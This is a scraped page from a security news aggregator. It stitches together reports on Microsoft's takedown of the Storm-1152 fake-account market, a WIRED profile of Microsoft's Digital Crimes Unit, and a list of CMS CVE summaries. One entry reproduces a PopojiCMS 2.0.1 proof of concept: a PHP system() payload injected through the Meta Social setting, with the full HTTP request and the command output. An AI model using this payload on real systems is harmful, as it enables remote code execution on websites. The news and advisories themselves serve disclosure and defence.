By Deeba Ahmed
The internet's underbelly is thriving on stolen identities and fake accounts, fueling mass phishing campaigns, identity theft rings, and DDoS attacks.
This is a post from HackRead.com Read the original post: Microsoft Busts Black Market for 100s of Millions of Fraudulent Accounts

Microsoft Threat Intelligence, partnered with cybersecurity firm Arkose’s ACTIR, conducted a large-scale operation against online fraudulent login markets, successfully taking down Hotmailbox.me.

Microsoft has successfully dismantled a black market for fraudulent login credentials. This action followed an investigation aimed at disrupting the fake Microsoft account network known as Storm-1152, extensively utilized by cybercriminals.

The seizure notice (Screengrab: Microsoft)

Researchers believe that cracking down on fraudulent accounts is crucial because cybercrime relies on fraudulent accounts as these act as digital keys for mass phishing, spam campaigns, and ransomware attacks.

The use of fraudulent and stolen login credentials by cybercriminals for large-scale data breaches is an undeniable reality. The recent attack on OAuth app users, **as revealed by Microsoft just yesterday**, serves as a small example amidst more significant incidents.

For your information, Storm-1152 is the world’s leading seller and creator of fraudulent Microsoft accounts. The platform has been exposed through a collaborative effort between Microsoft Threat Intelligence and cybersecurity firm Arkose’s Cyber Threat Intelligence Research unit (ACTIR). 

According to Microsoft’s **report**, Storm-1152 operates a network of illicit websites and social media pages, selling fake Microsoft accounts and identity verification bypass tools. So far, the operators have generated around 750 million fraudulent accounts, leaving a trail of destruction.

Storm-1152, a notorious group in the cybercrime-as-a-service (**CaaS**) industry, specializes in producing and selling millions of fraudulent Microsoft accounts. The group is impactful because it lowers the barrier to entry, enabling a wider range of actors to engage in cybercrime. This efficiency boosts the scope and frequency of cyberattacks, impacting countless individuals and businesses.

Microsoft aims to dismantle Storm-1152’s infrastructure and disrupt the entire ecosystem that enables their activities, aiming to create a safer online environment for everyone. Microsoft has obtained a court order from the Southern District of New York to **seize** U.S.-based infrastructure and offline websites used by Storm-1152 to harm Microsoft customers.

The case focuses on fraudulent Microsoft accounts and services sold to bypass security measures on other technology platforms. Microsoft’s Digital Crimes Unit disrupted Hotmailbox.me, 1stCAPTCHA, AnyCAPTCHA, and NoneCAPTCHA, which facilitate **CAPTCHA** solve service sales and identity verification bypass tools for other platforms.

The malicious marketplace Hotmailbox.me (Screengrab: Microsoft)

Researchers have also uncovered links between Storm-1152’s network and various cybercrime groups, including Octo Tempest, Storm-0252, and Storm-0455.

Nevertheless, this was a multi-phased operation launched to expose the people operating the malicious servers. Researchers used various investigative techniques, including network traffic analysis, telemetry data, and reverse engineering, to identify the source of the storm.

They identified three individuals, Duong Dinh Tu, Linh Van Nguyễn, and Tai Van Nguyen, as the masterminds behind the Storm-1152 machine. They hosted illegitimate platforms, authored the code, published tutorials, and offered live chat support.

Screengrab: Microsoft

Exposing the individuals behind Storm-1152 was crucial in dismantling this criminal network and holding accountable those who actively enabled online crime. Additionally, this coordinated takedown sends a clear message to Storm-1152 and others following their path: they are being watched and soon will be caught.

****_RELATED ARTICLES_****

1.  **Storm-1283 Sent 927K Phishing Emails with Malicious OAuth Apps**
2.  **Chinese Group Storm-0558 Hacked European Govt Emails, Microsoft**
3.  **Storm-0324 Exploits MS Teams Chats to Facilitate Ransomware Attacks**
4.  **Microsoft and Fortra to Take Down Malicious Cobalt Strike Infrastructure**
5.  **EvilProxy Phishing Kit Targets Microsoft Users via Indeed.com Vulnerability**
6.  **Scammers Use Fake Ledger App on Microsoft Store to Steal $800K in Crypto**

Microsoft Busts Black Market for 100s of Millions of Fraudulent Accounts

Ten years in, Microsoft’s DCU has honed its strategy of using both unique legal tactics and the company’s technical reach to disrupt global cybercrime and state-backed actors.

Governments and the tech industry around the world have been scrambling in recent years to curb the rise of online scamming and cybercrime. Yet even with progress on digital defenses, enforcement, and deterrence, the ransomware attacks, business email compromises, and malware infections keep on coming. Over the past decade, Microsoft's Digital Crimes Unit (DCU) has forged its own strategies, both technical and legal, to investigate scams, take down criminal infrastructure, and block malicious traffic.

The DCU is fueled, of course, by Microsoft's massive scale and the visibility across the internet that comes from the reach of Windows. But DCU team members repeatedly told WIRED that their work is motivated by very personal goals of protecting victims rather than a broad policy agenda or corporate mandate.

In just its latest action, the DCU announced Wednesday evening efforts to disrupt a cybercrime group that Microsoft calls Storm-1152. A middleman in the criminal ecosystem, Storm-1152 sells software services and tools like identity verification bypass mechanisms to other cybercriminals. The group has grown into the number one creator and vendor of fake Microsoft accounts—creating roughly 750 million scam accounts that the actor has sold for millions of dollars.

The DCU used legal techniques it has honed over many years related to protecting intellectual property to move against Storm-1152. The team obtained a court order from the Southern District of New York on December 7 to seize some of the criminal group’s digital infrastructure in the US and take down websites including the services 1stCAPTCHA, AnyCAPTCHA, and NoneCAPTCHA, as well as a site that sold fake Outlook accounts called Hotmailbox.me.

The strategy reflects the DCU’s evolution. A group with the name “Digital Crimes Unit” has existed at Microsoft since 2008, but the team in its current form took shape in 2013 when the old DCU merged with a Microsoft team known as the Intellectual Property Crimes Unit.

“Things have become a lot more complex,” says Peter Anaman, a DCU principal investigator. “Traditionally you would find one or two people working together. Now, when you’re looking at an attack, there are multiple players. But if we can break it down and understand the different layers that are involved it will help us be more impactful.”

The DCU’s hybrid technical and legal approach to chipping away at cybercrime is still unusual, but as the cybercriminal ecosystem has evolved—alongside its overlaps with state-backed hacking campaigns—the idea of employing creative legal strategies in cyberspace has become more mainstream. In recent years, for example, Meta-owned WhatsApp and Apple both took on the notorious spyware maker NSO Group with lawsuits.

Still, the DCU's particular progression was the result of Microsoft's unique dominance during the rise of the consumer internet. As the group's mission came into focus while dealing with threats from the late 2000s and early 2010s—like the widespread Conficker worm—the DCU's unorthodox and aggressive approach drew criticism at times for its fallout and potential impacts on legitimate businesses and websites.

“There's simply no other company that takes such a direct approach to taking on scammers,” WIRED wrote in a story about the DCU from October 2014. “That makes Microsoft rather effective, but also a little bit scary, observers say.”

Richard Boscovich, the DCU’s assistant general counsel and a former assistant US attorney in Florida’s Southern District, told WIRED in 2014 that it was frustrating for people within Microsoft to see malware like Conficker rampage across the web and feel like the company could improve the defenses of its products, but not do anything to directly deal with the actors behind the crimes. That dilemma spurred the DCU’s innovations and continues to do so.

“What’s impacting people? That’s what we get asked to take on, and we’ve developed a muscle to change and to take on new types of crime,” says Zoe Krumm, the DCU’s director of analytics. In the mid-2000s, Krumm says, Brad Smith, now Microsoft’s vice chair and president, was a driving force in turning the company’s attention toward the threat of email spam.

“The DCU has always been a bit of an incubation team. I remember all of a sudden, it was like, ‘We have to do something about spam.’ Brad comes to the team and he’s like, ‘OK, guys, let’s put together a strategy.’ I’ll never forget that it was just, ‘Now we’re going to focus here.’ And that has continued, whether it be moving into the malware space, whether it be tech support fraud, online child exploitation, business email compromise.”

As the group has matured and expanded into all of these areas, Boscovich says, a “preoccupation with exposure to liability and risk” is another element of the work that keeps him up at night.

“You want to help, and you want to do all these things, but no good deed goes unpunished sometimes,” he says. “Sometimes, we would try to help someone—and to help them you kind of shut their computer down—and even though you’re trying to help them, their small business goes down. So how do you manage that? That’s always been the hardest part of my job. The legal creativity is cool, but how do I make sure that it’s acceptable risk and that we research everything so there’s no collateral damage?”

The legal strategies the group has focused on developing evolve as digital threats evolve. In 2016, the DCU began taking the approach of establishing a court “special master” when working on disruptions related to state-sponsored hacking. This judge-appointed official is a direct point of contact for ongoing cases and even remains active for years after a case has been officially closed, enabling the DCU to get court approval for infrastructure takedowns and other actions without having to file for new court orders.

“It allows us to stay on top of these threats and get an order within minutes,” Boscovich says. “We can accelerate the process of litigation almost to the speed of cyber.”

He also points out the challenge of taking action against threat actors given the professionalization of the cybercriminal ecosystem in recent years. Crime groups now operate as syndicates with different departments working on different aspects of carrying out crimes while also contracting with third parties for services they don't develop in-house.

“There’s a legal problem: How do you get a bunch of people doing separate activities into one complaint or one charge? They don’t always even know each other,” Boscovich says. To address this situation, the group worked on legal strategies under the US Racketeer Influenced and Corrupt Organizations Act (RICO), which is designed to focus on criminal organizations rather than individual criminal acts.

“These are the guys who developed the malware, brokered the malware, operate the malware, so we can put them all into one legal filing to bring them together,” he says. “Now that has become part of our legal game plan as well.”

As cybercriminal and state-backed hacking has continued to escalate, the DCU has expanded its collaborations with law enforcement and used its techniques during an ever-changing array of global crises. In 2016, for example, the group carried out its first disruption of a state actor, conducting takedowns related to Russia’s APT 28, known as Fancy Bear. The attackers had been using Microsoft-like domains in their notorious phishing rampages and disinformation campaigns related to that year’s US elections. In 2018, the group shared findings with the Delhi police about the actors behind 10 criminal call centers in India who were scamming victims in the US, Canada, the Netherlands, and Australia. The information-sharing resulted in 63 arrests. In 2020, the DCU seized domains used in pandemic-related cybercrime and also conducted takedowns against the notorious Trickbot ransomware group ahead of the 2020 US elections.

“We tend to think about it from the victim protection perspective,” says Amy Hogan-Burney, who oversees the DCU as Microsoft's general manager and associate general counsel of cybersecurity policy and protection. “I leave deterrence generally to governments, but what I always focus on is victim protection. That can be narrow, meaning a Microsoft customer or type of Microsoft customer, or it can be really broad—anyone who is using the internet who may be impacted by cybercrime.”

Microsoft’s Digital Crime Unit Goes Deep on How It Disrupts Cybercrime

JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) in the site management office.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-50137: CVE/3/There is a storage type xss in the site management office.md at main · yukino-hiki/CVE

JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via carousel image editing.

CVE-2023-50100: cms/There is a storage type XSS for carousel image editing.md at master · Jarvis-616/cms

JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via Label management editing.

CVE-2023-50101: cms/Label management editing with stored XSS.md at master · Jarvis-616/cms

JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS).

CVE-2023-50102: cms/Content data exists in storage XSS for editing.md at master · Jarvis-616/cms

Remote unauthenticated attackers can overwrite arbitrary server files with attacker-controllable data. The data that the attacker can control is not entirely arbitrary. h2o writes a CSV/XLS/etc file to disk, so the attacker data is wrapped in quotations and starts with "C1", if they're exporting as CSV.

**External Control of File Name or Path in h2oai/h2o-3**

Critical severity GitHub Reviewed Published Dec 14, 2023 to the GitHub Advisory Database • Updated Dec 15, 2023

GHSA-gqrq-j6pm-98c2: External Control of File Name or Path in h2oai/h2o-3

PopojiCMS version 2.0.1 is vulnerable to remote command execution in the Meta Social field.

    # Exploit Title: PopojiCMS Version : 2.0.1  Remote Command Execution# Date: 27/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.popojicms.org/# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip# Version: Version : 2.0.1# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS##POC:1 ) Login with admin cred and click settings2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1Host: demos5.softaculous.comCookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7DUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=settingContent-Type: application/x-www-form-urlencodedContent-Length: 58Origin: https://demos5.softaculous.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closemeta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3EResult: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

CVE-2023-50011: PopojiCMS 2.0.1 Remote Command Execution ≈ Packet Storm

Semcms v4.8 was discovered to contain a SQL injection vulnerability via the AID parameter at SEMCMS_Function.php.

CVE-2023-50563: Cms_Vuls_test/Semcms/Semcms_Sql_Inject.md at main · SecBridge/Cms_Vuls_test

An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file.

Tag

#git